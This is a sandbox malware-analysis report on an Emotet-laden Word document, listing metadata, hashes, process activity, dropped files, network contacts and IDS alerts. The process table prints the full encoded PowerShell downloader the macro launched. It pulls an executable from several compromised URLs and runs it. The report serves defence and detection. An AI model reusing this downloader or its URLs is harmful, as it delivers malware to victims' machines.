File name: | 20191007 878250.doc |
Full analysis: | https://app.any.run/tasks/d9853733-aef2-424e-82f6-329eefea99a2 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:43:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: forecast, Subject: Incredible Plastic Soap, Author: Tiana Leannon, Comments: bleeding-edge mission-critical, Template: Normal.dotm, Last Saved By: Halie O'Keefe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 7 17:32:00 2019, Last Saved Time/Date: Mon Oct 7 17:32:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0 |
MD5: | 430618189FC70E817A482842E8B78962 |
SHA1: | EFACFE7AFE9154D6BA924915A5A8EE5645BF3DFA |
SHA256: | BF709BC17DF401A4CCAD2EE86D6FCBD25EDD93A51ED9D28EA6ED04330B9AC48A |
SSDEEP: | 6144:Z95qGAPbLkI07NSU4jJnqATfDeW5xidvxst:Z95qGAXX07NSU4V7PZi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Hayes |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 193 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Kuvalis, Schroeder and Von |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 166 |
Words: | 28 |
Pages: | 1 |
ModifyDate: | 2019:10:07 16:32:00 |
CreateDate: | 2019:10:07 16:32:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Halie O'Keefe |
Template: | Normal.dotm |
Comments: | bleeding-edge mission-critical |
Keywords: | - |
Author: | Tiana Leannon |
Subject: | Incredible Plastic Soap |
Title: | forecast |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2380 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\20191007 878250.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2264 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABlAG4AZwBhAGcAZQBwAHAAdgA9ACcASABvAG0AZQBfAEwAbwBhAG4AXwBBAGMAYwBvAHUAbgB0AGIAegB2ACcAOwAkAGEAcgBjAGgAaQB0AGUAYwB0AHUAcgBlAHMAdABqAHAAIAA9ACAAJwAyADIAMAAnADsAJABwAGEAeQBtAGUAbgB0AGoAegBsAD0AJwBMAGUAbQBwAGkAcgBhAG0AZgBiACcAOwAkAHIAZQBkAHcAcABqAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhAHIAYwBoAGkAdABlAGMAdAB1AHIAZQBzAHQAagBwACsAJwAuAGUAeABlACcAOwAkAFUAegBiAGUAawBpAHMAdABhAG4AdwB1AG4APQAnAE0AdQBzAGkAYwBfAFMAcABvAHIAdABzAF8AXwBBAHUAdABvAG0AbwB0AGkAdgBlAGIAdQB6ACcAOwAkAEIAZQBkAGYAbwByAGQAcwBoAGkAcgBlAGoAcwBoAD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAFcARQBiAEMAbABpAGUAbgB0ADsAJABhAGMAdABpAG8AbgBpAHQAZQBtAHMAYwBmAHAAPQAnAGgAdAB0AHAAOgAvAC8AaABvAG0AZQBuAGcAeQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG8ANgBiAGEANwBjADEALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHcAaABwAGkAcABlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AOQB3AGkAOAA5ADQANwAvAEAAaAB0AHQAcABzADoALwAvAGcALQByAG8AbABsAGUAZAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AagBtAGMAaQA0ADUANwA1AC8AQABoAHQAdABwAHMAOgAvAC8AbABhAHIAcwB5AGEAYwBsAGUAYQBuAHEAOAAuAGMAbwBtAC8AbgBhAHQAdQByAGUALwBnAHMAMAAyADcAMAA1AC8AQABoAHQAdABwADoALwAvAGkAbgBkAGkAZQB2AGkAcwB1AGEAbABlAG4AdAAuAGMAbwBtAC8AegA3ADYAOAAzADQALwAnAC4AIgBTAGAAcABsAGkAdAAiACgAJwBAACcAKQA7ACQAUABlAHIAcwBvAG4AYQBsAF8ATABvAGEAbgBfAEEAYwBjAG8AdQBuAHQAYwBxAGkAPQAnAEIAZQByAGsAcwBoAGkAcgBlAGsAdwBoACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAGkAawBlAHoAdQBtACAAaQBuACAAJABhAGMAdABpAG8AbgBpAHQAZQBtAHMAYwBmAHAAKQB7AHQAcgB5AHsAJABCAGUAZABmAG8AcgBkAHMAaABpAHIAZQBqAHMAaAAuACIARABPAFcATgBgAEwAbwBhAEQARgBgAGkATABlACIAKAAkAFAAaQBrAGUAegB1AG0ALAAgACQAcgBlAGQAdwBwAGoAKQA7ACQARwByAGEAbgBpAHQAZQB3AGgAawA9ACcAVQByAHUAZwB1AGEAeQBzAHUAcAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHIAZQBkAHcAcABqACkALgAiAEwAYABlAG4AZwBUAGgAIgAgAC0AZwBlACAAMwA2ADcANQAzACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABhAGAAUgB0ACIAKAAkAHIAZQBkAHcAcABqACkAOwAkAEIAcgBvAG8AawBvAG0AYQA9ACcATwByAGMAaABlAHMAdAByAGEAdABvAHIAaQBzAGkAJwA7AGIAcgBlAGEAawA7ACQAaABhAHIAZABfAGQAcgBpAHYAZQB3AHIAYwA9ACcAUABsAGEAcwB0AGkAYwBzAG4AdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwAHoAMgA0ADcAZAByAHEAPQAnAGIAbAB1AGUAbAB0AGgAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1876 | "C:\Users\admin\220.exe" | C:\Users\admin\220.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3024 | --82188f2e | C:\Users\admin\220.exe | — | 220.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDEC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q1Z2RPSKP5Q9D2Y0Y3RS.temp | — | |
MD5:— | SHA256:— | |||
2380 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:11F9BB5296474D9D3BB408404DE0DF6A | SHA256:8FACF4318FF2A7B51C03D42607D6E5D4F005B2B714B1C3B90CC4253F68854CA2 | |||
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:236ED52BF102E263426DE7B576190E96 | SHA256:4D4F843A4793638BCB319BAE2B5A8D54BB7B2D3C98665CA311101083360F85FB | |||
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\107A020D.wmf | wmf | |
MD5:A262438485FE6960F4EAEE514C9E6A46 | SHA256:6EBC0779E49963FA97B01C727BF795B79F7A45DD15BDD777CD4A2CADEB5550B6 | |||
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC2EC231.wmf | wmf | |
MD5:D1EA360D14D07DA4524374E54664EA75 | SHA256:035AEB7E1F82E3BA225956058EFC19D12787EB9EC0A7E6B9252FA5E906F52048 | |||
2264 | powershell.exe | C:\Users\admin\220.exe | executable | |
MD5:BADA3BF01142A56B6D2C33764C2405D1 | SHA256:E6630ADFC5882BE333236FD4DA6B8FB8C86866B4768B7914FA9102A3DE3BC3B0 | |||
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091 | SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F | |||
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79E105EB.wmf | wmf | |
MD5:9761D6F1CE99313C0A7914202993E2DF | SHA256:B10CEBC6B8CDE018E4F035D17381692B8DF6043DB7A534F919C016D35F239CB9 | |||
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\57396CA3.wmf | wmf | |
MD5:373F24AD9DE3637F5AEFF80DBC53AAC7 | SHA256:6DE2B0F376190E412676B48A0E726C81509CA57669AC16C71AE5D8126BEF2AFC |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2264 | powershell.exe | 49.234.127.87:80 | homengy.com | — | CN | suspicious |
Domain | IP | Reputation |
---|---|---|
homengy.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2264 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2264 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2264 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |